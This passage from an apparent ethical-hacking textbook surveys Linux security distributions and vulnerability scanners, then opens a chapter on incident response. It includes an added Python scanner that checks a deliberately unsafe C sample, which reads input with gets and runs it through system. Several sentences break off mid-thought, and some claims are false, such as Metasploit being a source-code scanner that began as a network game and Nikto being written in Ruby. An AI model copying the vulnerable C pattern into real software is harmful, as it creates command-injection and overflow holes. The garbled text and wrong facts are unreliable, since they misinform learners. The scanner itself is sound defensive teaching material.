rescue disks, security tools, multimedia versions, and others. In some cases these
distributions will not even have an option to install to the hard drive, allowing
the OS only to run from the media.

Trinity

The Trinity Rescue Kit (TRK) is a Linux distribution that is specifically designed to be run
from a CD or flash drive. The TRK was designed to recover and repair both Windows and
Linux systems that were otherwise unbootable or unrecoverable. While the TRK was
designed for benevolent purposes, it can easily be used to escalate privileges by resetting


Trinity can be used to change a password by booting
the target system off of a CD or flash drive and entering
the TRK environment. Once in the environment, a simple
sequence of commands can be executed to reset the password
of an account.

NOTE

Trinity can be used as a follow-on tool to the enumeration
techniques discussed earlier. Trinity works best when you
know the name of the account to be changed. The enumeration
techniques shown previously allow you to browse the
accounts on a system and select a target account.

Caine

Computer Aided INvestigative Environment (CAINE) is based on
the popular Ubuntu Linux live distribution and was created by
Digital Forensics for Interdepartmental Centre. The distribution
contains a collection of tools wrapped up into a user-friendly
environment. It has features that allow for the collection and
analysis of evidence for investigative purposes. The distribution
rich forensic functions.

Astaro

Astaro is an integrated all-in-one firewall: a full hardened OS designed to host
a firewall and perform all the functions of such an application, such as stateful
packet inspection, content filtering, application proxies, and IPSec-based virtual
private networks (VPNs). It is intended to enforce network security without
sacrificing performance, allowing branch offices, customers, and suppliers to

Damn Vulnerable Linux

Damn Vulnerable Linux (DVL) is a version of Linux that is based on the popular
Slackware and Slax-based live DVD. The distribution is designed to be purposefully
filled with broken, ill-configured, outdated, and exploitable software. It is intended as
a training aid or research tool that demonstrates various security concepts such as
reverse code engineering, buffer overflows, shell code development, Web exploitation,
and SQL injection.

Network Security Toolkit (NST)

Network Security Toolkit (NST) is a distribution based on the Fedora Core OS,
which was engineered to provide quick access to several open source network security
applications, and runs on x86 platforms. The goal of developing this distribution
is to provide a comprehensive set of open source network security tools. This distribution
can be used to transform an x86 system (Pentium II and above) into a system
designed for network traffic analysis, intrusion detection, network packet generation,
wireless network monitoring, a virtual system service server, or a sophisticated
network/host scanner.


Automated Assessment Tools

There are many tools available for performing network testing in the Linux world:
so many, in fact, that there is no way to mention every tool and package. In this section,
you will be introduced to some of the more widely used tools for performing security
testing that are based on the Linux platform.

As a security professional you will quickly learn that you cannot perform every
security test manually. In fact, many of the tests that you will be required to perform
are best left to automated tools. With the rapid evolution and deployment of threats and
the vulnerabilities associated with them, automated tools allow for the quick discovery
and subsequent process of addressing these problems.

As a security professional, you will most likely use a broad and diverse combination
of automated and manual assessment tools. Use an automated assessment tool and then
follow up with manual tools and analysis where appropriate. What an assessment tool
looks for depends on the tool in use, but it can be anything from applications, individual
systems, or an entire network:

• Source code scanners include those scanners specifically designed to examine
the source code of an application.
• Application scanners are those that are designed to analyze the weaknesses
in a specific application or type of application.
• System scanners analyze systems and/or networks for a wide range of configuration
or other types of application-level problems.

Source Code Scanners

Source code scanners are employed by those who need to locate security problems that
exist in the source code of applications. Scanners in this category have the ability to detect
software problems that include buffer overflows, privilege escalations, and other software
errors and defects:

• Buffer overflows that would enable data to be written over portions of or alter
an executable, which would enable an attacker to perform any number of acts
• Race conditions that would cause a system to function incorrectly and even
deny access to resources to those authorized to use them
• Privilege escalation, such as when a piece of code executes with higher
privileges than should be allowed by the user who initiated the execution
• Input validation errors, when data is either wholly or partially unchecked
as it passes through the application, potentially causing errors

Some tools used to find these types of problems include:


• Flawfinder — An application written in the Python programming language.
This program can search through the source code of an application looking for
security flaws. Generates a report with flaws organized by priority or seriousness.
• Rough Auditing Tool for Security (RATS) — Authored in C, this program contains
the ability to process rules for analyzing source code; these rules are written in XML.
• StackGuard — A special compiler that is designed to build applications that are
hardened against specific types of attacks. Programs run through this compiler
tend to be largely or completely immune to specific types of attacks afterward.
• Libsafe — Generates a protection method that has the trait of not requiring
applications to be recompiled. It guards against buffer overflows and can protect
applications for which the source code isn’t available.
• Metasploit — This application is authored in the Ruby development language, and
was created in 2003 as a portable network game using the Perl scripting language.
This application is known for uncovering some of the most sophisticated exploits
in public security vulnerabilities. This tool is also useful to security researchers
for its ability to analyze security vulnerabilities.
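As an added example for the source-code scanner category described above (written for this page; it is not Flawfinder, RATS or any other tool in the list), the following Python flags calls to a constructed table of risky C functions, skips commented-out code and printf calls whose format string is a literal, and orders the report by severity the way the text says such scanners do. The rule table, severities, advice strings and the C sample it scans are all constructed.

```python
import re
from dataclasses import dataclass

# Constructed rule table: risky C calls -> (severity 1..5, advice for the developer).
RULES = {
    "gets":    (5, "no bounds check at all; use fgets with an explicit size"),
    "strcpy":  (4, "unbounded copy into a fixed buffer; use strlcpy or snprintf"),
    "strcat":  (4, "unbounded append; use strlcat or track the remaining space"),
    "sprintf": (4, "unbounded formatting into a buffer; use snprintf"),
    "system":  (4, "shell command execution; never build the command from untrusted input"),
    "strncpy": (2, "may leave the buffer unterminated; check the length argument"),
    "printf":  (1, "format string must be a literal, not user-controlled data"),
}
CALL_RE = re.compile(r"\b(" + "|".join(RULES) + r")\s*\(")


@dataclass(frozen=True)
class Finding:
    line: int
    func: str
    severity: int
    advice: str


def strip_comments(source: str) -> str:
    """Blank out /* */ and // comments, keeping newlines so line numbers stay correct."""
    source = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), source, flags=re.S)
    return re.sub(r"//[^\n]*", "", source)


def scan_source(source: str) -> list:
    """Return findings sorted by severity (highest first), then by line number."""
    findings = []
    for lineno, line in enumerate(strip_comments(source).splitlines(), start=1):
        for m in CALL_RE.finditer(line):
            func = m.group(1)
            severity, advice = RULES[func]
            # printf with a literal format string is fine; flag only the non-literal case
            if func == "printf" and re.match(r'\s*"', line[m.end():]):
                continue
            findings.append(Finding(lineno, func, severity, advice))
    return sorted(findings, key=lambda f: (-f.severity, f.line))


def format_report(findings: list) -> str:
    return "\n".join(f"[{f.severity}] line {f.line}: {f.func}() - {f.advice}" for f in findings)


# Constructed C sample with a few classic defects (not from the page).
SAMPLE_C = """\
#include <stdio.h>
#include <string.h>

/* strcpy(old, new); -- commented out, must not be reported */
void greet(const char *name) {
    char buf[32];
    strcpy(buf, name);            // unbounded copy
    printf("Hello, %s\\n", buf);  // literal format string: fine
    printf(buf);                  // caller-controlled format string
}

int main(void) {
    char cmd[64];
    gets(cmd);                    // unbounded read
    system(cmd);                  // runs whatever was read
    return 0;
}
"""

if __name__ == "__main__":
    print(format_report(scan_source(SAMPLE_C)))
```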

Application Level Scanners

Application vulnerability scanners are used to analyze applications that have been
compiled rather than the application’s source code itself. Tools in this category look for
potential vulnerabilities that can be uncovered as the application is executing. Scanners
of this type can look at every aspect of an application, including the compiled components
and configuration. Some examples of application-level scanners are:

• Whisker — An application scanner designed to analyze Web applications.
Specifically, this scanner is designed to look for errors in the Web server-side scripting
language known as Common Gateway Interface (CGI). Under the right conditions,
CGI is a powerful and effective scripting language. Under less than ideal conditions,
this language can lead to information leakage that can allow an attacker to observe
confidential information and run unauthorized commands.
• N-Stealth — This application scanner has the ability to analyze thousands of security
faults in applications and provide results in a formatted structure.
• WebInspect — A Web application vulnerability scanning tool. Can scan for more
than 1,500 known Web server and application vulnerabilities and perform smart
• Nikto — A simple Web vulnerability program that is fast and thorough, written
in Ruby. It even supports basic port scanning to determine whether a Web server
is running on any open ports.
• AppDetective — This application-level scanner performs penetration and audit tests.
It doesn’t need any special permissions; the test queries the server and attempts to
glean information about the database it is running, such as its version.


System-Level Scanners

These types of scanners can probe entire systems and associated services and components.
A system-level scanner can be run against a single address or a range of addresses and
can also test the effectiveness of layered security measures, such as a system running
behind a firewall.

System-level scanners are not perfect. They have the ability to audit the source of the
processes that are enabling services, and they use the resulting responses of a service to
a finite number of probes, meaning that all possible inputs cannot be reasonably tested.
System-level scanners have also been known to crash systems in some cases, which
could impact system availability.

Some of the more popular system-level scanners include:

• Nessus — The well-known comprehensive, cross-platform, open source vulnerability
scanner with command line interface (CLI) and GUI interfaces. Nessus is a security
scanning and auditing tool that scans the ports and services a system exposes
looking for vulnerabilities.
• Nmap — A security scanner used to discover hosts and services on a computer
network that generates a virtual map of the network that has been targeted.
Can reveal the ports that are open on a single system or a range of systems and report
on each.
• SAINT — A well-known commercial scanner that provides vulnerability scanning
and identification. It has the ability to scan for vulnerabilities on the Common
Vulnerabilities and Exposures (CVE) list and can prioritize and rank these
vulnerabilities from most to least critical.
• SARA — A system-level scanner that is command line-based and has a Web-based
GUI. Instead of building a new module for every conceivable action much like
Nessus, SARA has the ability to work with other well-known open source products
to get a more comprehensive scan.
• LANguard — A scanner that reports information, such as the service pack level
of each machine, missing security patches, open shares, open ports, key registry
entries, weak passwords, users and groups, and more.
• VLAD — A vulnerability scanner that is written in Perl. VLAD is designed to
identify vulnerabilities in the SANS Top 10 List.


CHAPTER SUMMARY

In your career as a security professional it is highly likely that you will encounter
operating systems other than the familiar Windows desktop. One of them is Linux.
While Windows still can lay claim to the majority of desktops in the world, you still
need some familiarity with other operating systems to be complete as a security
professional.

As a security professional, it is important for you to always have an understanding
of the tools available to you, and using all the tools available to you requires some
knowledge of the Linux OS. In fact, several useful tools are available only in Linux
versions, so you have no other option but to learn Linux. The Linux OS is different from
the Windows operating system, with a universe of different files and folders that will
require some effort from you to learn. Linux offers a tremendous amount of benefits:
It is free and has a number of tools that will become available to you.

Additionally, Linux offers benefits that Windows just cannot offer, such as Live CDs.
Linux is one of the very few OSs that can be run off of removable media such as flash
drives, CDs, DVDs, and portable hard drives. Linux can be booted off removable media
without being installed on a hard drive or on a computer, eliminating the need to
make changes to the computer itself.

KEY CONCEPTS AND TERMS

Ipchains
Iptables
Kernel
Live CD
Root user


CHAPTER 13 ASSESSMENT

1. The ________ is the core of the Linux operating system.
A. kernel
B. shell
C. GUI
D. VPN

2. ________ runs completely from removable media.
A. Linux
B. Live CD
C. Kernel
D. Shell

3. ________ is a desktop interface for Linux.
A. KDE
B. GUI
C. Windows
D. Graphics

4. ________ is a text-based interface for Linux.
A. Terminal
B. KDE
C. Gnome
D. GUI

5. The command mv is used to remove empty directories.
A. True
B. False

6. The command used to display where you are in the file system is cd.
A. True
B. False

7. The command mv is designed to move files.
A. True
B. False

8. The command ________ can be used to remove a file or folder.
A. rm
B. mv
C. dv
D. ls

9. The command ________ is used to create new directories.
A. eddir
B. mkdir
C. rmdir
D. lsdir

10. The command ________ is used to list the files and subdirectories in a given location.
A. ls
B. dir
C. rm
D. del

Incident Response and Defensive Technologies

CHAPTER 14 Incident Response 320

CHAPTER 15 Defensive Technologies 344

Incident Response

AS A SECURITY PROFESSIONAL, you will be versed in a number of different
technologies and techniques, each designed to prevent an attack and secure
the organization. Each of the techniques you will learn is meant to prevent
an attack or limit its scope, but the reality is that attacks can and will happen, and
the techniques you have learned in this course cannot ever be guaranteed to stop
an attack from penetrating your organization. As a security professional, this is
a reality that you will have to accept.

Once you have accepted that an attack will inevitably penetrate your organization
at some point, your job now becomes one of how to respond to these situations:
This is the role of incident response. Incident response, as the name implies, is the
process of how you and your organization will respond to a security incident when
it occurs. Although security incidents are bound to happen, you shouldn’t sit by
and let them happen. You have to know how you will respond and the details
of this response.

Incident response is not only the act of how you respond to a security incident
but also the details involved in that response. If you respond incorrectly to an
incident you could make a bad situation worse. For example, not knowing what
to do, whom to call, or what the chain of command is in these situations would
potentially do further damage.

Finally, something that will have substantial impact on incident response is its
potential legal aspect. When a security incident happens, it may frequently fall under
the banner of computer or related crimes, so it might require that additional care be
taken when responding. When you decide that you wish to pursue criminal charges,
you move from the realm of just responding to performing a formal investigation.
The formal investigation will include special techniques for gathering and processing
evidence for the purpose of potentially prosecuting the criminal later.

This chapter investigates and examines the various aspects of incident response
and how you can plan and design a process for responding to a breach in your
organization.

Chapter 14 Topics

This chapter covers the following topics and concepts:

• What a security incident is
• What the process of incident response is
• What incident response plans (IRPs) are
• What planning for disaster and recovery is
• What evidence handling and administration is
• What requirements of regulated industries are

Chapter 14 Goals

When you complete this chapter, you will be able to:

• List the components of incident response
• List the goals of incident response

What Is a Security Incident?

A security incident in an organization is a serious event that can occur at any point from
the desktop level to the servers and infrastructure that make the network work. A security
incident can be anything, including accidental actions that result in a problem, up to and
including the downright malicious. Regardless of why a security incident occurred, the
organization must respond appropriately.

A security incident can cover a lot of different events, but to clarify what constitutes
a security incident, the following guidelines tend to apply:

• The result is the theft or misuse of confidential information of any type, such as
customer information, patient information, or financial information.
• It substantially affects the network infrastructure and services, such as performance
or security.
• It provides a platform for launching attacks against a third party.

Other events can and will be included on this list, depending on the organization and the
environment in which it functions. For example, a company in the health care field would
this information. A security incident can be simply thought of as an event or situation
that adversely impacts the security stance of the organization.

322 PART 3 Incident Response and Defensive Technologies

The concept of investigating a crime versus investigating an incident can be confusing.
In reality, there are a couple of points to consider when deciding the best course of action:

• Unless it is a serious crime with effects outside of your organization (for example, murder
or theft of credit card information), you have no legal obligation to involve the police
or press charges. Many businesses may opt not to report computer crimes because the
• In the event of an incident in which you do want to involve law enforcement, you will
follow the rules of evidence. If you think things are moving toward this end, you should
not try to handle things internally; instead, opt to let law enforcement professionals deal
with the incident.

The Incident Response Process

As a security professional, you are responsible for reducing the chance of a security
breach or incident to the lowest possible level. However, no matter how hard you try, the
reality is that you are only reducing the chance of a security incident, not eliminating it,
which is nearly impossible. So as a well-prepared professional you must plan how you will
react when a security incident occurs. This planning will reap benefits, as it will give you
the edge when determining what to do after an incident and how to do it. Proper security
incident response will determine whether an incident is dealt with sw